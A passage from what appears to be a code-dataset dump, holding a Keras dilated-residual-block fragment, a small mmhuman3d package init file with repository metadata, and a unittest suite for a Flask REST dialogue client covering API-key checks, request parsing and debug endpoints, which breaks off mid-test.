        x = Conv2D(nb_filter2, (kernel_size, kernel_size), dilation_rate=atrous_rate,
                   padding='same', name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
        # Identity shortcut: add the unmodified input back onto the main path.
        x = Add()([x, input_tensor])
        x = Activation('relu')(x)
        return x
    return f
def atrous_conv_block(kernel_size, filters, stage, block, weight_decay=0., strides=(1, 1), atrous_rate=(2, 2), batch_momentum=0.99):
    '''conv_block is the block that has a conv layer at shortcut
    # Arguments
        kernel_size: default 3, the kernel size of middle conv layer at main path
        filters: list of integers, the nb_filters of 3 conv layer at main path
        stage: integer, current stage label, used for generating layer names
        block: 'a','b'..., current block label, used for generating layer names
        weight_decay: l2 regularization factor applied to every conv kernel
        strides: strides of the first main-path conv AND of the shortcut conv
        atrous_rate: dilation rate of the middle (kxk) conv layer
        batch_momentum: momentum passed to each BatchNormalization layer

    # Returns
        A closure ``f(input_tensor) -> tensor`` that builds the residual block.
    '''
    def f(input_tensor):
        nb_filter1, nb_filter2, nb_filter3 = filters
        # Batch-norm axis depends on the backend image format (channels last vs first).
        if K.image_data_format() == 'channels_last':
            bn_axis = 3
        else:
            bn_axis = 1
        conv_name_base = 'res' + str(stage) + block + '_branch'
        bn_name_base = 'bn' + str(stage) + block + '_branch'
        # Main path: strided 1x1 -> dilated kxk (same padding) -> 1x1 bottleneck.
        x = Conv2D(nb_filter1, (1, 1), strides=strides,
                   name=conv_name_base + '2a', kernel_regularizer=l2(weight_decay))(input_tensor)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter2, (kernel_size, kernel_size), padding='same', dilation_rate=atrous_rate,
                   name=conv_name_base + '2b', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b', momentum=batch_momentum)(x)
        x = Activation('relu')(x)
        x = Conv2D(nb_filter3, (1, 1), name=conv_name_base + '2c', kernel_regularizer=l2(weight_decay))(x)
        x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c', momentum=batch_momentum)(x)
        # Projection shortcut: strided 1x1 conv matches the main path's shape.
        shortcut = Conv2D(nb_filter3, (1, 1), strides=strides,
                          name=conv_name_base + '1', kernel_regularizer=l2(weight_decay))(input_tensor)
        shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1', momentum=batch_momentum)(shortcut)
        x = Add()([x, shortcut])
        x = Activation('relu')(x)
        return x
    return f
| 51.464516
| 132
| 0.648239
| 1,116
| 7,977
| 4.420251
| 0.103943
| 0.058382
| 0.043787
| 0.045408
| 0.921346
| 0.917494
| 0.917494
| 0.917494
| 0.913035
| 0.913035
| 0
| 0.024318
| 0.237057
| 7,977
| 154
| 133
| 51.798701
| 0.786231
| 0.230036
| 0
| 0.888889
| 0
| 0
| 0.040592
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.080808
| false
| 0
| 0.030303
| 0
| 0.191919
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a6acbb4976d2f7a5a881a547055c56a485c882e
| 157
|
py
|
Python
|
mmhuman3d/data/data_structures/__init__.py
|
ttxskk/mmhuman3d
|
f6d39e24a2d5cc216448fc3bd82832ff45eee436
|
[
"Apache-2.0"
] | null | null | null |
mmhuman3d/data/data_structures/__init__.py
|
ttxskk/mmhuman3d
|
f6d39e24a2d5cc216448fc3bd82832ff45eee436
|
[
"Apache-2.0"
] | null | null | null |
mmhuman3d/data/data_structures/__init__.py
|
ttxskk/mmhuman3d
|
f6d39e24a2d5cc216448fc3bd82832ff45eee436
|
[
"Apache-2.0"
] | null | null | null |
# Package-level re-exports: make the human_data module and its HumanData
# container importable directly from this package.
from mmhuman3d.data.data_structures import human_data
from mmhuman3d.data.data_structures.human_data import HumanData

__all__ = ['HumanData', 'human_data']
| 31.4
| 63
| 0.834395
| 21
| 157
| 5.809524
| 0.380952
| 0.221311
| 0.278689
| 0.344262
| 0.508197
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013889
| 0.082803
| 157
| 4
| 64
| 39.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.121019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6a8b8518a8f54bb9b7f454ec64f7db31bc79da59
| 28,477
|
py
|
Python
|
dialogue-engine/test/programytest/clients/restful/yadlan/flask/test_client.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 104
|
2020-03-30T09:40:00.000Z
|
2022-03-06T22:34:25.000Z
|
dialogue-engine/test/programytest/clients/restful/yadlan/flask/test_client.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 25
|
2020-06-12T01:36:35.000Z
|
2022-02-19T07:30:44.000Z
|
dialogue-engine/test/programytest/clients/restful/yadlan/flask/test_client.py
|
cotobadesign/cotoba-agent-oss
|
3833d56e79dcd7529c3e8b3a3a8a782d513d9b12
|
[
"MIT"
] | 10
|
2020-04-02T23:43:56.000Z
|
2021-05-14T13:47:01.000Z
|
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import unittest.mock
import os
import shutil
from programy.clients.restful.yadlan.flask.client import FlaskYadlanClient
from programy.clients.restful.client import UserInfo
from programytest.clients.arguments import MockArgumentParser
class MockFlaskYadlanClient(FlaskYadlanClient):
    """Test double for FlaskYadlanClient.

    Records whether server_abort() was invoked and lets tests script the
    outcome of ask_question() via the ``answer`` and
    ``ask_question_exception`` attributes.
    """

    def __init__(self, argument_parser=None):
        super().__init__("yadlan", argument_parser)
        # State the tests inspect or preset directly.
        self.aborted = False
        self.answer = None
        self.ask_question_exception = False

    def server_abort(self, error_code, error_msg):
        # Remember the abort happened, then raise so the caller's
        # error-handling path is exercised instead of Flask's abort().
        self.aborted = True
        raise Exception("Pretending to abort!")

    def ask_question(self, userid, question, userInfo, deleteVariable, loglevel, nlu_latency=True):
        # Simulate a backend failure when requested by the test...
        if self.ask_question_exception:
            raise Exception("Something bad happened")
        # ...otherwise hand back the canned answer plus the echoed question.
        return self.answer, question
class FlaskYadlanClientTests(unittest.TestCase):
    """Tests for FlaskYadlanClient covering request parsing, API-key
    verification, response formatting, and the debug-request endpoint.

    Several tests construct a real client from ``testdata/config.yaml`` and
    check the files it writes under ``testdata/tmp``; those tests remove the
    tmp directory before and after to stay independent of each other.
    """

    # --- construction -------------------------------------------------

    def test_rest_client_init(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)

    # --- API key handling ---------------------------------------------

    def test_verify_api_key_usage_inactive(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._use_api_keys = False
        request = unittest.mock.Mock()
        # With api keys disabled, verification is a no-op: (None, None).
        self.assertEqual((None, None), client.verify_api_key_usage(request))

    def test_get_api_key(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        request = unittest.mock.Mock()
        request.args = {}
        request.args['apikey'] = '11111111'
        self.assertEqual('11111111', client.get_api_key(request))

    def test_verify_api_key_usage_active(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._use_api_keys = True
        # Key file two directories up from this test module.
        client.configuration.client_configuration._api_key_file = os.path.dirname(__file__) + os.sep + ".." + os.sep + ".." + os.sep + "api_keys.txt"
        client.load_api_keys()
        request = unittest.mock.Mock()
        request.args = {}
        request.args['apikey'] = '11111111'
        # Key not present in the loaded file -> 401 payload.
        self.assertEqual(({'error': 'Unauthorized access'}, 401), client.verify_api_key_usage(request))

    def test_verify_api_key_usage_active_no_apikey(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        client.configuration.client_configuration._use_api_keys = True
        request = unittest.mock.Mock()
        request.args = {}
        response = client.verify_api_key_usage(request)
        self.assertIsNotNone(response)

    def test_verify_api_key_usage_active_invalid_apikey(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        client.configuration.client_configuration._use_api_keys = True
        request = unittest.mock.Mock()
        request.args = {}
        request.args['apikey'] = 'invalid'
        response = client.verify_api_key_usage(request)
        self.assertIsNotNone(response)

    # --- request-body field extraction --------------------------------

    def test_get_question(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        self.assertEqual("Hello", client.get_question(request))

    def test_get_question_no_question(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # JSON null utterance is surfaced as the string "None".
        request.data = b'{"userId": "1234567890", "utterance": null}'
        self.assertEqual("None", client.get_question(request))

    def test_get_question_none_question(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # Missing utterance key behaves the same as null.
        request.data = b'{"userId": "1234567890"}'
        self.assertEqual("None", client.get_question(request))

    def test_get_userid(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890"}'
        self.assertEqual("1234567890", client.get_userid(request))

    def test_get_userid_no_userid(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{}'
        self.assertEqual("None", client.get_userid(request))

    def test_get_userid_none_userid(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # Both JSON null and empty string map to the string "None".
        request.data = b'{"userId": null}'
        self.assertEqual("None", client.get_userid(request))
        request.data = b'{"userId": ""}'
        self.assertEqual("None", client.get_userid(request))

    def test_get_other_data(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"config": {"logLevel": "debug"}}'
        self.assertEqual("debug", client.get_config_option(request, 'logLevel'))
        self.assertEqual("debug", client.get_config_loglevel(request))
        # logLevel is case sensitive: upper-case value is rejected.
        request.data = b'{"config": {"logLevel": "DEBUG"}}'
        with self.assertRaises(Exception):
            client.get_config_loglevel(request)
        request.data = b'{"variables": {"test": "value"}}'
        self.assertEqual('{"test": "value"}', client.get_variables(request))

    # --- malformed request bodies abort via server_abort --------------

    def test_invalid_request_empty(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b''
        # Every accessor must abort on an empty body; the mock's
        # server_abort() raises, so assertRaises + aborted flag.
        with self.assertRaises(Exception):
            client.get_userid(request)
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_deleteVariable(request)
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_metadata(request)
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_config_option(request, 'logLevel')
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_variables(request)
        self.assertTrue(client.aborted)

    def test_invalid_request_not_json(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'test_data, aaa'
        # Same abort behaviour for a body that is not valid JSON.
        with self.assertRaises(Exception):
            client.get_userid(request)
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_deleteVariable(request)
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_metadata(request)
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_config_option(request, 'logLevel')
        self.assertTrue(client.aborted)
        with self.assertRaises(Exception):
            client.get_variables(request)
        self.assertTrue(client.aborted)

    # --- response formatting ------------------------------------------

    def test_format_success_response(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890"}'
        userInfo = UserInfo(client, request)
        response = client.format_success_response("1234567890", "Hello", "Hi", userInfo)
        self.assertIsNotNone(response)
        self.assertEqual("1234567890", response['userId'])
        self.assertEqual("Hello", response['utterance'])
        self.assertEqual("Hi", response['response'])
        self.assertEqual("None", response['topic'])

    def test_format_error_response(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890"}'
        userInfo = UserInfo(client, request)
        response = client.format_error_response("1234567890", "Hello", "Something Bad", userInfo)
        self.assertIsNotNone(response)
        self.assertEqual("1234567890", response['userId'])
        self.assertEqual("Hello", response['utterance'])
        # Error responses carry an empty answer plus the error text.
        self.assertEqual("", response['response'])
        self.assertEqual("None", response['topic'])
        self.assertEqual("Something Bad", response['error'])

    # --- process_request ----------------------------------------------

    def test_process_request(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._use_api_keys = False
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.answer = "Hi"
        response, _ = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual("1234567890", response['userId'])
        self.assertEqual("Hello", response['utterance'])
        self.assertEqual("Hi", response['response'])

    def test_process_request_no_api_key(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._use_api_keys = True
        request = unittest.mock.Mock()
        request.args = {}
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.answer = "Hi"
        response, status = client.process_request(request)
        self.assertIsNotNone(response)
        # Missing api key with keys enabled -> 401.
        self.assertEqual(status, 401)

    def test_process_request_no_question(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.args = {}
        request.data = b'{"userId": "1234567890"}'
        response, status = client.process_request(request)
        self.assertIsNotNone(response)
        # No utterance in the body -> 400.
        self.assertEqual(status, 400)

    def test_process_request_exception(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._use_api_keys = False
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.answer = "Hi"
        # Force the mock's ask_question() to raise -> 500.
        client.ask_question_exception = True
        response, status = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual(status, 500)

    # --- misc client behaviour ----------------------------------------

    def test_checkBotVersion(self):
        arguments = MockArgumentParser()
        client = MockFlaskYadlanClient(arguments)
        self.assertIsNotNone(client)
        # No version configured yet -> mismatch.
        self.assertEqual(False, client.checkBotVersion('v1.0'))
        bot = client._bot_factory.select_bot()
        bot.configuration._version = 'v1.0'
        self.assertEqual(True, client.checkBotVersion('v1.0'))
        self.assertEqual(False, client.checkBotVersion('v1 0'))

    def test_dump_request(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._debug = True
        request = unittest.mock.Mock()
        response_data = "hello"
        latency = 1.0
        # Valid JSON, empty body and non-JSON body must all be dumpable
        # without raising.
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.dump_request_response(request, response_data, latency)
        request.data = b''
        client.dump_request_response(request, response_data, latency)
        request.data = b'test'
        client.dump_request_response(request, response_data, latency)

    def test_ask_question(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        client.configuration.client_configuration._debug = True
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        response, _ = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual("1234567890", response['userId'])
        # Note: the echoed utterance comes back sentence-terminated.
        self.assertEqual("Hello.", response['utterance'])
        self.assertEqual("", response['response'])

    # --- process_debug_request (uses testdata/config.yaml + tmp dir) ---

    def test_process_debug_request_variables_name(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        # Start from a clean tmp directory.
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.process_request(request)
        request = unittest.mock.Mock()
        # "name"-typed variables land in conversation properties.
        request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual(4, len(debugInfo))
        self.assertEqual(200, status)
        self.assertEqual("value1", debugInfo['conversations']['properties']['testname'])
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_variables_data(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.process_request(request)
        request = unittest.mock.Mock()
        # "data"-typed variables land in conversation data_properties.
        request.data = b'{"userId": "1234567890", "variables": [{"type": "data", "key": "testdata", "value": "value1"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual(4, len(debugInfo))
        self.assertEqual(200, status)
        self.assertEqual("value1", debugInfo['conversations']['data_properties']['testdata'])
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_variables_multi(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.process_request(request)
        request = unittest.mock.Mock()
        # Mixed "name" and "data" variables in one request.
        request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}, {"type": "data", "key": "testdata", "value": "value2"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual(4, len(debugInfo))
        self.assertEqual(200, status)
        self.assertEqual("value1", debugInfo['conversations']['properties']['testname'])
        self.assertEqual("value2", debugInfo['conversations']['data_properties']['testdata'])
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_no_conversation(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # No prior process_request -> no conversation -> empty debug info.
        request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual(0, len(debugInfo))
        self.assertEqual(200, status)

    def test_process_debug_request_not_server_mode(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        # Outside server mode the debug payload has one fewer section.
        client._server_mode = False
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "utterance": "Hello"}'
        client.process_request(request)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "1234567890", "variables": [{"type": "name", "key": "testname", "value": "value1"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual(3, len(debugInfo))
        self.assertEqual(200, status)
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_invalid_variables_type(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # Unknown variable type "var" is rejected with 400.
        request.data = b'{"userId": "1234567890", "variables": [{"type": "var", "key": "testvar", "value": "value1"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual('Invalid variables list format', debugInfo['error'])
        self.assertEqual(400, status)

    def test_process_debug_request_invalid_variables_parameter(self):
        arguments = MockArgumentParser()
        client = FlaskYadlanClient("yadlan", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # Entry without the expected type/key fields is rejected with 400.
        request.data = b'{"userId": "1234567890", "variables": [{"var": "test", "value": "value1"}]}'
        debugInfo, status = client.process_debug_request(request)
        self.assertEqual('Invalid variables list format', debugInfo['error'])
        self.assertEqual(400, status)

    def test_process_debug_request(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        # Files the configured client is expected to create under tmp.
        errors_file = tmp_dir + os.sep + "errors.txt"
        duplicates_file = tmp_dir + os.sep + "duplicates.txt"
        conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
        logs_file = tmp_dir + os.sep + "testrest_testUser.log"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "testUser", "utterance": "Hello"}'
        response, _ = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual("testUser", response['userId'])
        self.assertEqual("Hello.", response['utterance'])
        self.assertEqual("HELLO, WORLD.", response['response'])
        self.assertTrue(os.path.exists(errors_file))
        self.assertTrue(os.path.exists(duplicates_file))
        self.assertTrue(os.path.exists(conversation_file))
        self.assertTrue(os.path.exists(logs_file))
        request = unittest.mock.Mock()
        request.data = b'{"userId": "testUser"}'
        debug_info, _ = client.process_debug_request(request)
        self.assertTrue('errors' in debug_info)
        self.assertTrue('duplicates' in debug_info)
        self.assertTrue('conversations' in debug_info)
        self.assertTrue('logs' in debug_info)
        self.assertTrue('current_conversation' in debug_info)
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_with_logs(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        errors_file = tmp_dir + os.sep + "errors.txt"
        duplicates_file = tmp_dir + os.sep + "duplicates.txt"
        conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
        logs_file = tmp_dir + os.sep + "testrest_testUser.log"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # The "LOGS" utterance exercises the log-output grammar path.
        request.data = b'{"userId": "testUser", "utterance": "LOGS"}'
        response, _ = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual("testUser", response['userId'])
        self.assertEqual("LOGS.", response['utterance'])
        self.assertEqual("Output log.", response['response'])
        self.assertTrue(os.path.exists(errors_file))
        self.assertTrue(os.path.exists(duplicates_file))
        self.assertTrue(os.path.exists(conversation_file))
        self.assertTrue(os.path.exists(logs_file))
        request = unittest.mock.Mock()
        request.data = b'{"userId": "testUser"}'
        debug_info, _ = client.process_debug_request(request)
        self.assertTrue('errors' in debug_info)
        self.assertTrue('duplicates' in debug_info)
        self.assertTrue('conversations' in debug_info)
        self.assertTrue('logs' in debug_info)
        self.assertTrue('current_conversation' in debug_info)
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_with_variables(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        errors_file = tmp_dir + os.sep + "errors.txt"
        duplicates_file = tmp_dir + os.sep + "duplicates.txt"
        conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
        logs_file = tmp_dir + os.sep + "testrest_testUser.log"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        # The "VARIABLES" utterance sets name/data/var properties which
        # should then be visible in the debug payload.
        request.data = b'{"userId": "testUser", "utterance": "VARIABLES"}'
        response, _ = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual("testUser", response['userId'])
        self.assertEqual("VARIABLES.", response['utterance'])
        self.assertEqual("Variable datas.", response['response'])
        self.assertTrue(os.path.exists(errors_file))
        self.assertTrue(os.path.exists(duplicates_file))
        self.assertTrue(os.path.exists(conversation_file))
        self.assertTrue(os.path.exists(logs_file))
        request = unittest.mock.Mock()
        request.data = b'{"userId": "testUser"}'
        debug_info, _ = client.process_debug_request(request)
        self.assertTrue('errors' in debug_info)
        self.assertTrue('duplicates' in debug_info)
        self.assertTrue('conversations' in debug_info)
        self.assertTrue('logs' in debug_info)
        self.assertTrue('current_conversation' in debug_info)
        self.assertEqual("name_value", debug_info['conversations']['properties']['name_key'])
        self.assertEqual("data_value", debug_info['conversations']['data_properties']['data_key'])
        question = debug_info['conversations']['questions'][0]
        self.assertEqual("var_value", question['var_properties']['var_key'])
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))

    def test_process_debug_request_no_userid(self):
        home_dir = os.path.dirname(__file__) + os.sep + "testdata"
        tmp_dir = home_dir + os.sep + "tmp"
        errors_file = tmp_dir + os.sep + "errors.txt"
        duplicates_file = tmp_dir + os.sep + "duplicates.txt"
        conversation_file = tmp_dir + os.sep + "testrest_testUser.conv"
        logs_file = tmp_dir + os.sep + "testrest_testUser.log"
        if os.path.exists(tmp_dir):
            shutil.rmtree(tmp_dir)
        self.assertFalse(os.path.exists(tmp_dir))
        config_file = home_dir + os.sep + "config.yaml"
        arguments = MockArgumentParser(config=config_file)
        client = FlaskYadlanClient("testrest", arguments)
        self.assertIsNotNone(client)
        request = unittest.mock.Mock()
        request.data = b'{"userId": "testUser", "utterance": "Hello"}'
        response, _ = client.process_request(request)
        self.assertIsNotNone(response)
        self.assertEqual("testUser", response['userId'])
        self.assertEqual("Hello.", response['utterance'])
